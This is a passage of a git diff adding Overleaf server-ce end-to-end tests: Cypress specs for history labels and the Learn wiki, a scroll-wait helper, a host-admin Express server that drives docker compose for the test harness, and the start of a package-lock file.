+    await sleep(POLL_INTERVAL)
+    attempt++
+  }
+  throw new Error(`${file} not found`)
+}
diff --git a/server-ce/test/helpers/waitUntilScrollingFinished.ts b/server-ce/test/helpers/waitUntilScrollingFinished.ts
new file mode 100644
index 0000000..af4c565
--- /dev/null
+++ b/server-ce/test/helpers/waitUntilScrollingFinished.ts
@@ -0,0 +1,39 @@
+export function waitUntilScrollingFinished(selector: string, start = -1) {
+  const pollSlow = 100
+  const pollFast = 10
+  const deadline =
+    performance.now() + Cypress.config('defaultCommandTimeout') - pollSlow * 2
+  return cy.get(selector).then(el => {
+    cy.log(
+      `waiting until scrolling finished for ${selector}, starting from ${start}`
+    )
+    return new Cypress.Promise((resolve, reject) => {
+      const waitForStable = (prev: number, stableFor: number) => {
+        if (performance.now() > deadline) {
+          return reject(new Error('timeout waiting for scrolling to finish'))
+        }
+        const current = el.scrollTop()!
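+        // the scroll position must hold steady for 5 consecutive fast polls
+        // (~50ms) before the animation counts as finished; any movement
+        // resets the stability counter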
+ if (current !== prev) { + setTimeout(() => waitForStable(current, 0), pollFast) + } else if (stableFor < 5) { + setTimeout(() => waitForStable(current, stableFor + 1), pollFast) + } else { + resolve(current) + } + } + + const waitForChange = () => { + if (performance.now() > deadline) { + return reject(new Error('timeout waiting for scrolling to start')) + } + const current = el.scrollTop()! + if (current === start) { + setTimeout(() => waitForChange(), pollSlow) + } else { + setTimeout(() => waitForStable(current, 0), pollFast) + } + } + waitForChange() + }) + }) +} diff --git a/server-ce/test/history.spec.ts b/server-ce/test/history.spec.ts new file mode 100644 index 0000000..f0d7e74 --- /dev/null +++ b/server-ce/test/history.spec.ts @@ -0,0 +1,124 @@ +import { createProject } from './helpers/project' +import { throttledRecompile } from './helpers/compile' +import { ensureUserExists, login } from './helpers/login' +import { isExcludedBySharding, startWith } from './helpers/config' + +describe('History', function () { + if (isExcludedBySharding('CE_DEFAULT')) return + startWith({}) + ensureUserExists({ email: 'user@example.com' }) + beforeEach(function () { + login('user@example.com') + }) + + function addLabel(name: string) { + cy.log(`add label ${JSON.stringify(name)}`) + cy.findByText('Labels').click() + cy.findAllByTestId('history-version-details') + .first() + .within(() => { + cy.get('button').click() // TODO: add test-id or aria-label + cy.findByText('Label this version').click() + }) + cy.findByRole('dialog').within(() => { + cy.get('input[placeholder="New label name"]').type(`${name}{enter}`) + }) + } + + function downloadVersion(name: string) { + cy.log(`download version ${JSON.stringify(name)}`) + cy.findByText('Labels').click() + cy.findByText(name) + .closest('[data-testid="history-version-details"]') + .within(() => { + cy.get('.history-version-dropdown-menu-btn').click() + cy.findByText('Download this version').click() + }) + } + + const CLASS_ADDITION = 'ol-cm-addition-marker' + const CLASS_DELETION = 'ol-cm-deletion-marker' + + it('should support labels, comparison and download', () => { + createProject('labels') + const recompile = throttledRecompile() + + cy.log('add content, including a line that will get removed soon') + cy.findByText('\\maketitle').parent().click() + cy.findByText('\\maketitle').parent().type('\n% added') + cy.findByText('\\maketitle').parent().type('\n% to be removed') + recompile() + cy.findByText('History').click() + + cy.log('expect to see additions in history') + cy.get('.document-diff-container').within(() => { + cy.findByText('% to be removed').should('have.class', CLASS_ADDITION) + cy.findByText('% added').should('have.class', CLASS_ADDITION) + }) + + addLabel('Before removal') + + cy.log('remove content') + cy.findByText('Back to editor').click() + cy.findByText('% to be removed').parent().type('{end}{shift}{upArrow}{del}') + recompile() + cy.findByText('History').click() + + cy.log('expect to see annotation for newly removed content in history') + cy.get('.document-diff-container').within(() => { + cy.findByText('% to be removed').should('have.class', CLASS_DELETION) + cy.findByText('% added').should('not.have.class', CLASS_ADDITION) + }) + + addLabel('After removal') + + cy.log('add more content after labeling') + cy.findByText('Back to editor').click() + cy.findByText('\\maketitle').parent().click() + cy.findByText('\\maketitle').parent().type('\n% more') + recompile() + + cy.log('compare non current versions') + 
cy.findByText('History').click() + cy.findByText('Labels').click() + cy.findAllByTestId('compare-icon-version').last().click() + cy.findAllByTestId('compare-icon-version').filter(':visible').click() + cy.findByText('Compare up to this version').click() + + cy.log( + 'expect to see annotation for removed content between the two versions' + ) + cy.get('.document-diff-container').within(() => { + cy.findByText('% to be removed').should('have.class', CLASS_DELETION) + cy.findByText('% added').should('not.have.class', CLASS_ADDITION) + cy.findByText('% more').should('not.exist') + }) + + downloadVersion('Before removal') + cy.task('readFileInZip', { + pathToZip: `cypress/downloads/labels (Version 2).zip`, + fileToRead: 'main.tex', + }) + .should('contain', '% added') + .should('contain', '% to be removed') + .should('not.contain', '% more') + + downloadVersion('After removal') + cy.task('readFileInZip', { + pathToZip: `cypress/downloads/labels (Version 3).zip`, + fileToRead: 'main.tex', + }) + .should('contain', '% added') + .should('not.contain', '% to be removed') + .should('not.contain', '% more') + + downloadVersion('Current state') + cy.task('readFileInZip', { + pathToZip: `cypress/downloads/labels (Version 4).zip`, + fileToRead: 'main.tex', + }) + .should('contain', '% added') + .should('not.contain', '% to be removed') + .should('contain', '% more') + }) +}) diff --git a/server-ce/test/host-admin.js b/server-ce/test/host-admin.js new file mode 100644 index 0000000..9e4cd5d --- /dev/null +++ b/server-ce/test/host-admin.js @@ -0,0 +1,331 @@ +const fs = require('fs') +const Path = require('path') +const { execFile } = require('child_process') +const express = require('express') +const bodyParser = require('body-parser') +const { + celebrate: validate, + Joi, + errors: handleValidationErrors, +} = require('celebrate') +const YAML = require('js-yaml') + +const DATA_DIR = Path.join( + __dirname, + 'data', + // Give each shard their own data dir. + process.env.CYPRESS_SHARD || 'default' +) +const PATHS = { + DOCKER_COMPOSE_FILE: 'docker-compose.yml', + // Give each shard their own override file. 
+ DOCKER_COMPOSE_OVERRIDE: `docker-compose.${process.env.CYPRESS_SHARD || 'override'}.yml`, + DOCKER_COMPOSE_NATIVE: 'docker-compose.native.yml', + DATA_DIR, + SANDBOXED_COMPILES_HOST_DIR: Path.join(DATA_DIR, 'compiles'), +} +const IMAGES = { + CE: process.env.IMAGE_TAG_CE.replace(/:.+/, ''), + PRO: process.env.IMAGE_TAG_PRO.replace(/:.+/, ''), +} + +let previousConfig = '' + +function readDockerComposeOverride() { + try { + return YAML.load(fs.readFileSync(PATHS.DOCKER_COMPOSE_OVERRIDE, 'utf-8')) + } catch (error) { + if (error.code !== 'ENOENT') { + throw error + } + return { + services: { + sharelatex: { + environment: {}, + }, + 'git-bridge': {}, + }, + } + } +} + +function writeDockerComposeOverride(cfg) { + fs.writeFileSync(PATHS.DOCKER_COMPOSE_OVERRIDE, YAML.dump(cfg)) +} + +function runDockerCompose(command, args, callback) { + const files = ['-f', PATHS.DOCKER_COMPOSE_FILE] + if (process.env.NATIVE_CYPRESS) { + files.push('-f', PATHS.DOCKER_COMPOSE_NATIVE) + } + if (fs.existsSync(PATHS.DOCKER_COMPOSE_OVERRIDE)) { + files.push('-f', PATHS.DOCKER_COMPOSE_OVERRIDE) + } + execFile('docker', ['compose', ...files, command, ...args], callback) +} + +function purgeDataDir() { + fs.rmSync(PATHS.DATA_DIR, { recursive: true, force: true }) +} + +const app = express() +app.get('/status', (req, res) => { + res.send('host-admin is up') +}) + +app.use(bodyParser.json()) +app.use((req, res, next) => { + // Basic access logs + console.log(req.method, req.url, req.body) + // Add CORS headers + const accessControlAllowOrigin = + process.env.ACCESS_CONTROL_ALLOW_ORIGIN || 'http://sharelatex' + res.setHeader('Access-Control-Allow-Origin', accessControlAllowOrigin) + res.setHeader('Access-Control-Allow-Headers', 'Content-Type') + res.setHeader('Access-Control-Max-Age', '3600') + next() +}) + +app.post( + '/run/script', + validate( + { + body: { + cwd: Joi.string().required(), + script: Joi.string().required(), + args: Joi.array().items(Joi.string()), + }, + }, + { allowUnknown: false } + ), + (req, res) => { + const { cwd, script, args } = req.body + + runDockerCompose( + 'exec', + [ + 'sharelatex', + 'bash', + '-c', + `source /etc/container_environment.sh && source /etc/overleaf/env.sh || source /etc/sharelatex/env.sh && cd ${JSON.stringify(cwd)} && node ${JSON.stringify(script)} ${args.map(a => JSON.stringify(a)).join(' ')}`, + ], + (error, stdout, stderr) => { + res.json({ + error, + stdout, + stderr, + }) + } + ) + } +) + +const allowedVars = Joi.object( + Object.fromEntries( + [ + 'OVERLEAF_APP_NAME', + 'OVERLEAF_LEFT_FOOTER', + 'OVERLEAF_RIGHT_FOOTER', + 'OVERLEAF_PROXY_LEARN', + 'GIT_BRIDGE_ENABLED', + 'GIT_BRIDGE_HOST', + 'GIT_BRIDGE_PORT', + 'V1_HISTORY_URL', + 'DOCKER_RUNNER', + 'SANDBOXED_COMPILES', + 'SANDBOXED_COMPILES_SIBLING_CONTAINERS', + 'ALL_TEX_LIVE_DOCKER_IMAGE_NAMES', + 'OVERLEAF_TEMPLATES_USER_ID', + 'OVERLEAF_NEW_PROJECT_TEMPLATE_LINKS', + 'OVERLEAF_ALLOW_PUBLIC_ACCESS', + 'OVERLEAF_ALLOW_ANONYMOUS_READ_AND_WRITE_SHARING', + 'EXTERNAL_AUTH', + 'OVERLEAF_SAML_ENTRYPOINT', + 'OVERLEAF_SAML_CALLBACK_URL', + 'OVERLEAF_SAML_ISSUER', + 'OVERLEAF_SAML_IDENTITY_SERVICE_NAME', + 'OVERLEAF_SAML_EMAIL_FIELD', + 'OVERLEAF_SAML_FIRST_NAME_FIELD', + 'OVERLEAF_SAML_LAST_NAME_FIELD', + 'OVERLEAF_SAML_UPDATE_USER_DETAILS_ON_LOGIN', + 'OVERLEAF_SAML_CERT', + 'OVERLEAF_LDAP_URL', + 'OVERLEAF_LDAP_SEARCH_BASE', + 'OVERLEAF_LDAP_SEARCH_FILTER', + 'OVERLEAF_LDAP_BIND_DN', + 'OVERLEAF_LDAP_BIND_CREDENTIALS', + 'OVERLEAF_LDAP_EMAIL_ATT', + 'OVERLEAF_LDAP_NAME_ATT', + 'OVERLEAF_LDAP_LAST_NAME_ATT', + 
'OVERLEAF_LDAP_UPDATE_USER_DETAILS_ON_LOGIN',
+      // Old branding, used for upgrade tests
+      'SHARELATEX_SITE_URL',
+      'SHARELATEX_MONGO_URL',
+      'SHARELATEX_REDIS_HOST',
+    ].map(name => [name, Joi.string()])
+  )
+)
+
+function setVarsDockerCompose({ pro, vars, version, withDataDir }) {
+  const cfg = readDockerComposeOverride()
+
+  cfg.services.sharelatex.image = `${pro ? IMAGES.PRO : IMAGES.CE}:${version}`
+  cfg.services['git-bridge'].image = `quay.io/sharelatex/git-bridge:${version}`
+
+  cfg.services.sharelatex.environment = vars
+
+  if (cfg.services.sharelatex.environment.GIT_BRIDGE_ENABLED === 'true') {
+    cfg.services.sharelatex.depends_on = ['git-bridge']
+  } else {
+    cfg.services.sharelatex.depends_on = []
+  }
+
+  if (['ldap', 'saml'].includes(vars.EXTERNAL_AUTH)) {
+    cfg.services.sharelatex.depends_on.push(vars.EXTERNAL_AUTH)
+  }
+
+  // 5.0+ images moved the data dir; the lexicographic comparison is fine for
+  // the version strings under test
+  const dataDirInContainer =
+    version === 'latest' || version >= '5.0'
+      ? '/var/lib/overleaf/data'
+      : '/var/lib/sharelatex/data'
+
+  cfg.services.sharelatex.volumes = []
+  if (withDataDir) {
+    cfg.services.sharelatex.volumes.push(
+      `${PATHS.DATA_DIR}:${dataDirInContainer}`
+    )
+  }
+
+  if (
+    cfg.services.sharelatex.environment
+      .SANDBOXED_COMPILES_SIBLING_CONTAINERS === 'true'
+  ) {
+    cfg.services.sharelatex.environment.SANDBOXED_COMPILES_HOST_DIR =
+      PATHS.SANDBOXED_COMPILES_HOST_DIR
+    cfg.services.sharelatex.environment.TEX_LIVE_DOCKER_IMAGE =
+      process.env.TEX_LIVE_DOCKER_IMAGE
+    cfg.services.sharelatex.environment.ALL_TEX_LIVE_DOCKER_IMAGES =
+      process.env.ALL_TEX_LIVE_DOCKER_IMAGES
+    cfg.services.sharelatex.volumes.push(
+      '/var/run/docker.sock:/var/run/docker.sock'
+    )
+    if (!withDataDir) {
+      cfg.services.sharelatex.volumes.push(
+        `${PATHS.SANDBOXED_COMPILES_HOST_DIR}:${dataDirInContainer}/compiles`
+      )
+    }
+  }
+
+  writeDockerComposeOverride(cfg)
+}
+
+app.post(
+  '/docker/compose/:cmd',
+  validate(
+    {
+      body: {
+        // restrict args to a whitelist of flags and service names
+        args: Joi.array().items(
+          Joi.string().valid(
+            '--detach',
+            '--wait',
+            '--volumes',
+            '--timeout=60',
+            'sharelatex',
+            'git-bridge',
+            'mongo',
+            'redis'
+          )
+        ),
+      },
+      params: {
+        cmd: Joi.string().valid('up', 'stop', 'down', 'ps', 'logs'),
+      },
+    },
+    { allowUnknown: false }
+  ),
+  (req, res) => {
+    const { cmd } = req.params
+    const { args } = req.body
+    runDockerCompose(cmd, args, (error, stdout, stderr) => {
+      res.json({ error, stdout, stderr })
+    })
+  }
+)
+
+function maybeResetData(resetData, callback) {
+  if (!resetData) return callback()
+
+  previousConfig = ''
+  runDockerCompose(
+    'down',
+    ['--timeout=0', '--volumes', 'mongo', 'redis', 'sharelatex'],
+    (error, stdout, stderr) => {
+      if (error) return callback(error, stdout, stderr)
+
+      try {
+        purgeDataDir()
+      } catch (error) {
+        return callback(error)
+      }
+      callback()
+    }
+  )
+}
+
+app.post(
+  '/reconfigure',
+  validate(
+    {
+      body: {
+        pro: Joi.boolean().required(),
+        version: Joi.string().required(),
+        vars: allowedVars,
+        withDataDir: Joi.boolean().optional(),
+        resetData: Joi.boolean().optional(),
+      },
+    },
+    { allowUnknown: false }
+  ),
+  (req, res) => {
+    const { pro, version, vars, withDataDir, resetData } = req.body
+    maybeResetData(resetData, (error, stdout, stderr) => {
+      if (error) return res.json({ error, stdout, stderr })
+
+      const previousConfigServer = previousConfig
+      const newConfig = JSON.stringify(req.body)
+      if (previousConfig === newConfig) {
+        return res.json({ previousConfigServer })
+      }
+
+      try {
+        setVarsDockerCompose({ pro, version, vars, withDataDir })
+      } catch (error) {
+        return res.json({ error })
+      }
+
+      // `up --detach --wait` recreates only the sharelatex service and blocks
+      // until its healthcheck passes, so we only respond once the new
+      // configuration is actually serving
+      
runDockerCompose( + 'up', + ['--detach', '--wait', 'sharelatex'], + (error, stdout, stderr) => { + previousConfig = newConfig + res.json({ error, stdout, stderr, previousConfigServer }) + } + ) + }) + } +) + +app.get('/redis/keys', (req, res) => { + runDockerCompose( + 'exec', + ['redis', 'redis-cli', 'KEYS', '*'], + (error, stdout, stderr) => { + res.json({ error, stdout, stderr }) + } + ) +}) + +app.use(handleValidationErrors()) + +purgeDataDir() + +app.listen(80) diff --git a/server-ce/test/learn-wiki.spec.ts b/server-ce/test/learn-wiki.spec.ts new file mode 100644 index 0000000..c0cc872 --- /dev/null +++ b/server-ce/test/learn-wiki.spec.ts @@ -0,0 +1,106 @@ +import { isExcludedBySharding, startWith } from './helpers/config' +import { ensureUserExists, login } from './helpers/login' +import { v4 as uuid } from 'uuid' + +describe('LearnWiki', function () { + const COPYING_A_PROJECT_URL = '/learn/how-to/Copying_a_project' + const UPLOADING_A_PROJECT_URL = '/learn/how-to/Uploading_a_project' + + const WITHOUT_PROJECTS_USER = 'user-without-projects@example.com' + const REGULAR_USER = 'user@example.com' + + // Re-use value for "exists" and "does not exist" tests + const LABEL_LEARN_LATEX = 'Learn LaTeX with a tutorial' + + ensureUserExists({ email: WITHOUT_PROJECTS_USER }) + ensureUserExists({ email: REGULAR_USER }) + + describe('enabled in Pro', () => { + if (isExcludedBySharding('PRO_CUSTOM_2')) return + startWith({ + pro: true, + vars: { + OVERLEAF_PROXY_LEARN: 'true', + }, + }) + + it('should add a documentation entry to the nav bar', () => { + login(REGULAR_USER) + cy.visit('/project') + cy.get('nav').findByText('Documentation') + }) + + it('should display a tutorial link in the welcome page', () => { + login(WITHOUT_PROJECTS_USER) + cy.visit('/project') + cy.findByText(LABEL_LEARN_LATEX) + }) + + it('should render wiki page', () => { + login(REGULAR_USER) + cy.visit(UPLOADING_A_PROJECT_URL) + // Wiki content + cy.get('.page').findByText('Uploading a project') + cy.get('.page').contains(/how to create an Overleaf project/) + cy.get('img[alt="Creating a new project on Overleaf"]') + .should('be.visible') + .and((el: any) => { + expect(el[0].naturalWidth, 'renders image').to.be.greaterThan(0) + }) + // Wiki navigation + cy.get('.contents').findByText('Copying a project') + }) + + it('should navigate back and forth', function () { + login(REGULAR_USER) + cy.visit(COPYING_A_PROJECT_URL) + cy.get('.page').findByText('Copying a project') + cy.get('.contents').findByText('Uploading a project').click() + cy.url().should('contain', UPLOADING_A_PROJECT_URL) + cy.get('.page').findByText('Uploading a project') + cy.get('.contents').findByText('Copying a project').click() + cy.url().should('contain', COPYING_A_PROJECT_URL) + cy.get('.page').findByText('Copying a project') + }) + }) + + describe('disabled in Pro', () => { + if (isExcludedBySharding('PRO_DEFAULT_1')) return + startWith({ pro: true }) + checkDisabled() + }) + + describe('unavailable in CE', () => { + if (isExcludedBySharding('CE_CUSTOM_1')) return + startWith({ + pro: false, + vars: { + OVERLEAF_PROXY_LEARN: 'true', + }, + }) + + checkDisabled() + }) + + function checkDisabled() { + it('should not add a documentation entry to the nav bar', () => { + login(REGULAR_USER) + cy.visit('/project') + cy.findByText('Documentation').should('not.exist') + }) + + it('should not render wiki page', () => { + login(REGULAR_USER) + cy.visit(COPYING_A_PROJECT_URL, { + failOnStatusCode: false, + }) + cy.findByText('Not found') + }) + + it('should not 
display a tutorial link in the welcome page', () => { + login(WITHOUT_PROJECTS_USER) + cy.visit('/project') + cy.findByText(LABEL_LEARN_LATEX).should('not.exist') + }) + } +}) diff --git a/server-ce/test/package-lock.json b/server-ce/test/package-lock.json new file mode 100644 index 0000000..0587028 --- /dev/null +++ b/server-ce/test/package-lock.json @@ -0,0 +1,3538 @@ +{ + "name": "@overleaf/server-ce/test", + "lockfileVersion": 3, + "requires": true, + "packages": { + "": { + "name": "@overleaf/server-ce/test", + "dependencies": { + "@isomorphic-git/lightning-fs": "^4.6.0", + "@testing-library/cypress": "^10.0.1", + "@types/adm-zip": "^0.5.5", + "@types/pdf-parse": "^1.1.4", + "@types/uuid": "^9.0.8", + "adm-zip": "^0.5.12", + "body-parser": "^1.20.3", + "celebrate": "^15.0.3", + "cypress": "13.13.2", + "express": "^4.21.2", + "isomorphic-git": "^1.25.10", + "js-yaml": "^4.1.0", + "pdf-parse": "^1.1.1", + "typescript": "^5.0.4", + "uuid": "^9.0.1" + } + }, + "node_modules/@babel/code-frame": { + "version": "7.22.13", + "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", + "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", + "dependencies": { + "@babel/highlight": "^7.22.13", + "chalk": "^2.4.2" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/code-frame/node_modules/ansi-styles": { + "version": "3.2.1", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", + "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", + "dependencies": { + "color-convert": "^1.9.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/@babel/code-frame/node_modules/chalk": { + "version": "2.4.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", + "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", + "dependencies": { + "ansi-styles": "^3.2.1", + "escape-string-regexp": "^1.0.5", + "supports-color": "^5.3.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/@babel/code-frame/node_modules/color-convert": { + "version": "1.9.3", + "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", + "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", + "dependencies": { + "color-name": "1.1.3" + } + }, + "node_modules/@babel/code-frame/node_modules/color-name": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", + "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==" + }, + "node_modules/@babel/code-frame/node_modules/has-flag": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", + "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", + "engines": { + "node": ">=4" + } + }, + "node_modules/@babel/code-frame/node_modules/supports-color": { + "version": "5.5.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", + "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", + "dependencies": { + "has-flag": "^3.0.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/@babel/helper-validator-identifier": { + "version": "7.22.20", + "resolved": 
"https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", + "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/highlight": { + "version": "7.22.20", + "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", + "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", + "dependencies": { + "@babel/helper-validator-identifier": "^7.22.20", + "chalk": "^2.4.2", + "js-tokens": "^4.0.0" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/highlight/node_modules/ansi-styles": { + "version": "3.2.1", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", + "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", + "dependencies": { + "color-convert": "^1.9.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/@babel/highlight/node_modules/chalk": { + "version": "2.4.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", + "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", + "dependencies": { + "ansi-styles": "^3.2.1", + "escape-string-regexp": "^1.0.5", + "supports-color": "^5.3.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/@babel/highlight/node_modules/color-convert": { + "version": "1.9.3", + "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", + "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", + "dependencies": { + "color-name": "1.1.3" + } + }, + "node_modules/@babel/highlight/node_modules/color-name": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", + "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==" + }, + "node_modules/@babel/highlight/node_modules/has-flag": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", + "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", + "engines": { + "node": ">=4" + } + }, + "node_modules/@babel/highlight/node_modules/supports-color": { + "version": "5.5.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", + "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", + "dependencies": { + "has-flag": "^3.0.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/@babel/runtime": { + "version": "7.23.2", + "resolved": "https://registry.npmjs.org/@babel/runtime/-/runtime-7.23.2.tgz", + "integrity": "sha512-mM8eg4yl5D6i3lu2QKPuPH4FArvJ8KhTofbE7jwMUv9KX5mBvwPAqnV3MlyBNqdp9RyRKP6Yck8TrfYrPvX3bg==", + "dependencies": { + "regenerator-runtime": "^0.14.0" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@colors/colors": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/@colors/colors/-/colors-1.5.0.tgz", + "integrity": "sha512-ooWCrlZP11i8GImSjTHYHLkvFDP48nS4+204nGb1RiX/WXYHmJA2III9/e2DWVabCESdW7hBAEzHRqUn9OUVvQ==", + "optional": true, + "engines": { + "node": ">=0.1.90" + } + }, + "node_modules/@cypress/request": { + "version": "3.0.1", + "resolved": 
"https://registry.npmjs.org/@cypress/request/-/request-3.0.1.tgz", + "integrity": "sha512-TWivJlJi8ZDx2wGOw1dbLuHJKUYX7bWySw377nlnGOW3hP9/MUKIsEdXT/YngWxVdgNCHRBmFlBipE+5/2ZZlQ==", + "dependencies": { + "aws-sign2": "~0.7.0", + "aws4": "^1.8.0", + "caseless": "~0.12.0", + "combined-stream": "~1.0.6", + "extend": "~3.0.2", + "forever-agent": "~0.6.1", + "form-data": "~2.3.2", + "http-signature": "~1.3.6", + "is-typedarray": "~1.0.0", + "isstream": "~0.1.2", + "json-stringify-safe": "~5.0.1", + "mime-types": "~2.1.19", + "performance-now": "^2.1.0", + "qs": "6.10.4", + "safe-buffer": "^5.1.2", + "tough-cookie": "^4.1.3", + "tunnel-agent": "^0.6.0", + "uuid": "^8.3.2" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/@cypress/request/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/@cypress/xvfb": { + "version": "1.2.4", + "resolved": "https://registry.npmjs.org/@cypress/xvfb/-/xvfb-1.2.4.tgz", + "integrity": "sha512-skbBzPggOVYCbnGgV+0dmBdW/s77ZkAOXIC1knS8NagwDjBrNC1LuXtQJeiN6l+m7lzmHtaoUw/ctJKdqkG57Q==", + "dependencies": { + "debug": "^3.1.0", + "lodash.once": "^4.1.1" + } + }, + "node_modules/@cypress/xvfb/node_modules/debug": { + "version": "3.2.7", + "resolved": "https://registry.npmjs.org/debug/-/debug-3.2.7.tgz", + "integrity": "sha512-CFjzYYAi4ThfiQvizrFQevTTXHtnCqWfe7x1AhgEscTz6ZbLbfoLRLPugTQyBth6f8ZERVUSyWHFD/7Wu4t1XQ==", + "dependencies": { + "ms": "^2.1.1" + } + }, + "node_modules/@hapi/hoek": { + "version": "9.3.0", + "resolved": "https://registry.npmjs.org/@hapi/hoek/-/hoek-9.3.0.tgz", + "integrity": "sha512-/c6rf4UJlmHlC9b5BaNvzAcFv7HZ2QHaV0D4/HNlBdvFnvQq8RI4kYdhyPCl7Xj+oWvTWQ8ujhqS53LIgAe6KQ==" + }, + "node_modules/@hapi/topo": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/@hapi/topo/-/topo-5.1.0.tgz", + "integrity": "sha512-foQZKJig7Ob0BMAYBfcJk8d77QtOe7Wo4ox7ff1lQYoNNAb6jwcY1ncdoy2e9wQZzvNy7ODZCYJkK8kzmcAnAg==", + "dependencies": { + "@hapi/hoek": "^9.0.0" + } + }, + "node_modules/@isomorphic-git/idb-keyval": { + "version": "3.3.2", + "resolved": "https://registry.npmjs.org/@isomorphic-git/idb-keyval/-/idb-keyval-3.3.2.tgz", + "integrity": "sha512-r8/AdpiS0/WJCNR/t/gsgL+M8NMVj/ek7s60uz3LmpCaTF2mEVlZJlB01ZzalgYzRLXwSPC92o+pdzjM7PN/pA==" + }, + "node_modules/@isomorphic-git/lightning-fs": { + "version": "4.6.0", + "resolved": "https://registry.npmjs.org/@isomorphic-git/lightning-fs/-/lightning-fs-4.6.0.tgz", + "integrity": "sha512-tfon8f1h6LawjFI/d8lZPWRPTxmdvyTMbkT/j5yo6dB0hALhKw5D9JsdCcUu/D1pAcMMiU7GZFDsDGqylerr7g==", + "dependencies": { + "@isomorphic-git/idb-keyval": "3.3.2", + "isomorphic-textencoder": "1.0.1", + "just-debounce-it": "1.1.0", + "just-once": "1.1.0" + }, + "bin": { + "superblocktxt": "src/superblocktxt.js" + } + }, + "node_modules/@sideway/address": { + "version": "4.1.5", + "resolved": "https://registry.npmjs.org/@sideway/address/-/address-4.1.5.tgz", + "integrity": "sha512-IqO/DUQHUkPeixNQ8n0JA6102hT9CmaljNTPmQ1u8MEhBo/R4Q8eKLN/vGZxuebwOroDB4cbpjheD4+/sKFK4Q==", + "dependencies": { + "@hapi/hoek": 